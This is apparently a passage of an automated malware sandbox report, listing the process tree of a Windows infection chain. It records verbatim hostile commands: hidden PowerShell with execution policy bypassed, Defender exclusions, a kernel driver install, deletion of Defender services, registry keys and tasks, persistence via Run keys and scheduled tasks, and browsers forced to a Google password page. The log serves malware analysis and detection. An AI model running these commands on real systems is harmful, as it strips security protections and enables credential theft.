C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3556
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1696
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5056
C:\Users\Admin\AppData\Local\Temp\10374380101\7d5ce09794.exe"C:\Users\Admin\AppData\Local\Temp\10374380101\7d5ce09794.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:972
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2512
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1FD7.tmp\1FD8.tmp\1FD9.bat C:\Users\Admin\AppData\Local\Temp\221.exe"8⤵
- Suspicious use of WriteProcessMemory
PID:3012
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3856
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\20B2.tmp\20B3.tmp\20B4.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4804
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:4500
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:872
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:3208
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:3440
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:2172
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3476
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4568
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:3196
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:3816
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵
PID:2252
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:1656
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
PID:4548
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵
PID:2064
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:2648
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:440
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵
PID:4324
C:\Windows\system32\sc.exesc stop "Sense"11⤵
PID:1440
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:1452
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵
PID:212
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
PID:1040
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
PID:3748
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
PID:2960
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
PID:752
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:4320
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵
PID:4308
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:836
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
PID:644
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵
PID:2400
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
PID:1804
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:1300
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵
PID:3588
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:3348
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:2580
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵
PID:1036
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4500
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:3168
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵
PID:660
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
PID:4528
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:3180
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵
PID:316
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:4972
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:4864
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵
PID:3972
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:4028
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
PID:1596
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵
PID:4716
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:4840
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:1324
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵
PID:1956
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:4128
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:1228
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵
PID:676
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:1876
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:2864
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵
PID:2020
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵
PID:3968
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵
PID:1424
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵
PID:4296
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵
PID:2236
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4504
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:2148
C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe"C:\Users\Admin\AppData\Local\Temp\10375600101\A9cowK5.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2544
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"7⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3480
C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"C:\Users\Admin\AppData\Local\Temp\10378550101\kO2IdCz.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:212
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67e8f4de3ad1d.vbs7⤵
- Checks computer location settings
- Modifies registry class
PID:3076
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"8⤵
PID:3348
C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10378830101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4028
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2252
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C4F.tmp\7C60.tmp\7C61.bat C:\Users\Admin\AppData\Local\Temp\221.exe"8⤵
PID:4896
C:\Users\Admin\AppData\Local\Temp\221.exe"C:\Users\Admin\AppData\Local\Temp\221.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2148
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7D0B.tmp\7D0C.tmp\7D0D.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"10⤵
- Drops file in Program Files directory
PID:4128
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
PID:3892
C:\Windows\system32\sc.exesc start ddrver11⤵
PID:4196
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
PID:5012
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4968
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
PID:232
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4308
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4320
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
PID:1244
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
PID:2568
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵
PID:1300
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
PID:1388
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
PID:2896
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵
PID:2512
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
PID:5060
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
PID:1816
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵
PID:4452
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
PID:3012
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
PID:4632
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵
PID:444
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
PID:4056
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
PID:1284
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
PID:4408
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
PID:1556
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
PID:2288
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵
PID:3668
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
PID:5028
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
PID:1484
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵
PID:1044
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
PID:3664
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
PID:4972
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵
PID:2332
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:1876
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
PID:3816
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵
PID:3752
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
PID:4028
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
PID:2864
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵
PID:540
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
PID:440
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
PID:2648
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵
PID:1440
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
PID:4504
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
PID:4324
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵
PID:4980
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
PID:3092
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
PID:3204
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵
PID:4624
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
PID:3596
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
PID:5040
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵
PID:5012
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
PID:4968
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
PID:3488
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵
PID:752
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
PID:4320
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
PID:4008
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵
PID:2568
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵
PID:1300
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵
PID:1388
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵
PID:3016
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵
PID:3616
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
PID:4788
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
PID:4452
C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10380220101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3752
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4324
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1332
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3004
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
PID:2824
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
PID:3816
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1764
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:444
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2856
C:\Users\Admin\AppData\Local\Temp\is-R9EHL.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-R9EHL.tmp\Bell_Setup16.tmp" /SL5="$B02D0,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4028
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3196
C:\Users\Admin\AppData\Local\Temp\is-MA2DI.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-MA2DI.tmp\Bell_Setup16.tmp" /SL5="$1101EA,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2512
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3468
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1300
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe"PowerShell.exe" -NoProfile -NonInteractive -Command -13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1496
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
PID:1456
C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"8⤵
- Executes dropped EXE
PID:5192
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"9⤵
- Command and Scripting Interpreter: PowerShell
PID:5640
C:\Users\Admin\AppData\Roaming\BExplorer\bot.exeC:\Users\Admin\AppData\Roaming\BExplorer\bot.exe9⤵
- Executes dropped EXE
PID:6312
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"10⤵
- Command and Scripting Interpreter: PowerShell
PID:6348
C:\Users\Admin\AppData\Local\Temp\10045200101\50981a7f32.exe"C:\Users\Admin\AppData\Local\Temp\10045200101\50981a7f32.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:7060
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10045200101\50981a7f32.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6500
C:\Users\Admin\AppData\Local\Temp\10045210101\8ffa067850.exe"C:\Users\Admin\AppData\Local\Temp\10045210101\8ffa067850.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6540
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10045210101\8ffa067850.exe"9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6712
C:\Users\Admin\AppData\Local\Temp\10045220101\e269e6c0d6.exe"C:\Users\Admin\AppData\Local\Temp\10045220101\e269e6c0d6.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5980
C:\Users\Admin\AppData\Local\Temp\10380550101\e9ea3a76fa.exe"C:\Users\Admin\AppData\Local\Temp\10380550101\e9ea3a76fa.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2880
C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe"6⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1348
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\10381290101\NP4kBrG.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2084
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NP4kBrG.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4684
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2148
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'smss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2692
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "smss" /tr "C:\Users\Admin\AppData\Local\Temp\smss.exe"7⤵
- Scheduled Task/Job: Scheduled Task
PID:4368
C:\Users\Admin\AppData\Local\Temp\10381450101\2983c11b74.exe"C:\Users\Admin\AppData\Local\Temp\10381450101\2983c11b74.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4268
C:\Users\Admin\AppData\Local\Temp\10381460101\05be0399a2.exe"C:\Users\Admin\AppData\Local\Temp\10381460101\05be0399a2.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:2856
C:\Users\Admin\AppData\Local\Temp\10381470101\7ef3f93a66.exe"C:\Users\Admin\AppData\Local\Temp\10381470101\7ef3f93a66.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:444
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2004
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:1952
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4368
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3368
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3032
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵
PID:2588
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3440
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2008 -prefsLen 27099 -prefMapHandle 2012 -prefMapSize 270279 -ipcHandle 2088 -initialChannelId {eda74055-35d7-4bdd-a1fb-d743c4cb5cae} -parentPid 3440 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3440" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵
PID:4368
